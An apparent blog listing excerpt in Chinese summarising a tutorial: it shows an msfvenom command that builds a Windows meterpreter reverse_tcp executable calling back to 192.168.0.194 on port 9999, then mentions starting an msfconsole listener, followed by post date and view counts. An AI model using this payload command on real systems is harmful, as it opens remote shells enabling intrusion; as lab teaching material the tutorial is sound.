摘要: 1.msfvenom设置payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.194 LPORT=9999 -f exe > /home/kali/Desktop/shell.exe 2.msfconsole进行监听 阅读全文
posted @ 2021-02-22 22:42 磐正 阅读(90) 评论(0) 推荐(0)